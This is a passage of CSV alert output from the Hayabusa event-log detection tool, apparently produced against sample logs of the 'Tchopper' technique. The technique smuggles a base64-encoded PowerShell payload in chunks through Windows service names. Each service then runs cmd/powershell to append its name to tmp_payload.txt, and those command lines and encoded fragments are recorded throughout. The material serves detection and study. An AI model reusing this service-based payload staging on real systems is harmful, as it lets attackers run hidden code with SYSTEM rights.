Tchopper.evtx" +2021-11-03 08:18:11.349 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:11.349 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:11.349 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: VtTGFzdEV2ZW50VGltZSA9ICRTeXN0ZW1JbmZvLkVuZFRpbWUNCiAgICAgICAgICAgICRTeXN0ZW1Ub3RhbEV2ZW50cyA9ICRTeXN0ZW1JbmZvLlRvdGFsRXZlbnRzDQogICAgICAgICAgICAkU3lz | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg122"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:12.786 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:12.786 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:12.786 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dGVtRXZlbnRMb2dTaXplID0gJFN5c3RlbUluZm8uTG9nU2l6ZQ0KDQoNCiAgICAgICAgICAgICRUb3RhbEVQUyA9IFttYXRoXTo6Um91bmQoKCRBcHBsaWNhdGlvbkVQUyArICRTZWN1cml0eUVQUy | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg123"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:14.233 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:14.233 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:14.233 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ArICRTeXN0ZW1FUFMpLCA1KQ0KICAgICAgICAgICAgJFByb2ZpbGVTdWdnZXN0aW9uID0gR2V0LVByb2ZpbGVTdWdnZXN0aW9uICRUb3RhbEVQUw0KICAgICAgICAgICAgIyRDb21wdXRlck9TID0g | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg124"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:15.677 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:15.677 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:15.677 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: KEdldC1BRENvbXB1dGVyIC1GaWx0ZXIgKikuT3BlcmF0aW5nU3lzdGVtDQogICAgICAgICAgICAkQ29tcHV0ZXJPUyA9ICIkT1MiDQoNCg0KICAgICAgICAgICAgJEJveCA9IEB7IlByb2ZpbGVTdW | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg125"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:17.117 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:17.117 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:17.117 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: dnZXN0aW9uIiA9ICRQcm9maWxlU3VnZ2VzdGlvbjsgIlRvdGFsRVBTIiA9ICRUb3RhbEVQUzsgIk9TVmVyc2lvbiIgPSAkQ29tcHV0ZXJPUzsNCiAgICAgICAgICAgICAgICAgICAgICJBcHBsaWNh | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg126"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:19.634 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:19.634 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:19.634 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: A9ICRBcHBsaWNhdGlvbkxhc3RFdmVudFRpbWU7ICJBcHBsaWNhdGlvblRvdGFsRXZlbnRzIiA9ICRBcHBsaWNhdGlvblRvdGFsRXZlbnRzOyAiQXBwbGljYXRpb25FdmVudExvZ1NpemUiID0gJEFw | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg128"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:21.088 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:21.088 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:21.088 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: cGxpY2F0aW9uRXZlbnRMb2dTaXplOw0KICAgICAgICAgICAgICAgICAgICAgIlNlY3VyaXR5RVBTIiA9ICRTZWN1cml0eUVQUzsgIlNlY3VyaXR5Rmlyc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5Rm | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg129"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:22.542 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:22.542 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:22.542 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: lyc3RFdmVudFRpbWU7ICJTZWN1cml0eUxhc3RFdmVudFRpbWUiID0gJFNlY3VyaXR5TGFzdEV2ZW50VGltZTsgIlNlY3VyaXR5VG90YWxFdmVudHMiID0gJFNlY3VyaXR5VG90YWxFdmVudHM7ICJT | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg130"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:23.979 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:23.979 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:23.979 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZWN1cml0eUV2ZW50TG9nU2l6ZSIgPSAkU2VjdXJpdHlFdmVudExvZ1NpemU7IA0KICAgICAgICAgICAgICAgICAgICAgIlN5c3RlbUVQUyIgPSAkU3lzdGVtRVBTOyAiU3lzdGVtRmlyc3RFdmVudF | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg131"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:25.446 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:25.446 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:25.446 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: RpbWUiID0gJFN5c3RlbUZpcnN0RXZlbnRUaW1lOyAiU3lzdGVtTGFzdEV2ZW50VGltZSIgPSAkU3lzdGVtTGFzdEV2ZW50VGltZTsgIlN5c3RlbVRvdGFsRXZlbnRzIiA9ICRTeXN0ZW1Ub3RhbEV2 | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg132"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:26.912 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:26.912 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:26.912 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: ZW50czsgIlN5c3RlbUV2ZW50TG9nU2l6ZSIgPSAkU3lzdGVtRXZlbnRMb2dTaXplO30NCiAgICAgICAgICAgIA0KICAgICAgICAgICAgJFJlcG9ydC5BZGQoJENvbXB1dGVyLCAkQm94KSAgICAgIC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg133"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:28.373 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:28.373 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_SuspiciousService.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:28.373 +00:00,FS03.offsec.lan,7045,high,Persis,Malicious Service Possibly Installed,"Svc: AgICAgICAgICAgICAgICAgICAgDQoNCiAgICAgICAgICAgICRQZXJjZW50Q29tcGxldGUgPSAkUHJvZ3Jlc3NDb3VudCAvICRDb21wdXRlckNvdW50ICogMTAwDQogICAgICAgICAgICAkUGVyY2Vu | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg134"" | select -Expand DisplayName |out-file -append tmp_payload.txt""",rules/hayabusa/default/alerts/System/7045_ServiceInstalled_MaliciousServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - 
Tchopper.evtx" +2021-11-03 08:18:29.844 +00:00,FS03.offsec.lan,7045,info,Persis,Service Installed,"Name: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | Account: LocalSystem | Start Type: demand start",rules/hayabusa/default/events/System/7045_ServiceInstalled.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1569.002-Service execution/ID7000,7009,7045-Payload deployed via service - Tchopper.evtx" +2021-11-03 08:18:29.844 +00:00,FS03.offsec.lan,7045,high,Persis,Suspicious Service Installed,"Svc: dENvbXBsZXRlID0gW21hdGhdOjpSb3VuZCgkUGVyY2VudENvbXBsZXRlLCAwKQ0KDQogICAgICAgICAgICBXcml0ZS1Qcm9ncmVzcyAtQWN0aXZpdHkgIlByb2Nlc3NpbmcgQ29tcHV0ZXIgTGlzdC | Path: c:\windows\system32\cmd.exe /c powershell -command ""Get-Service ""seg135"" | select -Expand DisplayName |out-file -append tmp_payload.txt"" | 